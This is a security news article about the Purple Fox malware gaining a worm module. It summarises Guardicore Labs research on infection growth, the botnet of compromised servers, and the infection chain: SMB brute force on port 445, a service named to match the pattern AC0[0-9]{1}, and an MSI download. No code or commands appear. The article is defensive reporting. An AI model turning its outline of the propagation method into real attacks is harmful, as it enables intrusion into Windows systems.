Purple Fox malware make ways into vulnerable Windows systems

Purple Fox a malware that was earlier spread through exploit kits as well as malicious emails, has recently included a worm module

24-Mar-2021

3 min read

A malware, called Purple Fox, that was earlier spread through exploit kits as well as malicious emails, has recently included a worm module. This permits it to scan for and also infect Windows systems that are reachable over the Internet.Purple Fox entails rootkit and backdoor capabilities and was first detected in the year of 2018 after it had already infected around 30,000 devices.

It was then used as a downloader in order to deploy various malware strains. Guardicore Labs security researchers Amit Serper and Ophir Harpaz mentioned that, since May 2020, Purple Fox attacks have drastically increased. In fact, it has reached a total of 90,000 attacks and a mammoth rise of 600% in infections.

Purple-Fox-detections Image: Guardicore Labs

The trials of active port scanning and exploitation of the malware begun at the end of 2020 which was also based on telemetry that was gathered using the Guardicore Global Sensors Network (GGSN). Once the Windows system is detected while scanning for devices reachable over the Internet, the recently added worm module of Purple Fox makes use of SMB password brute force so as to infect it. Purple-Fox-attack-flow Image: Purple Fox attack flow (Guardicore Labs)

According to what the Guardicore Labs report stated, Purple Fox has deployed its malware droppers and also some extra modules on a widely extensive network of bots, a huge team of over 2,000 compromised servers. After the malware is run on system launch, each of the systems that are infected will subsequently display the same worm-like behavior, while scanning continually.

"Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns," Serper and Harpaz stated.

"As the machine responds to the SMB probe that's being sent on port 445, it will try to authenticate to SMB by brute-forcing usernames and passwords or by trying to establish a null session," Guardicore Labs said. "If the authentication is successful, the malware will create a service whose name matches the regex AC0[0-9]{1} — e.g. AC01, AC02, AC05 (as mentioned before) that will download the MSI installation package from one of the many HTTP servers and thus will complete the infection loop."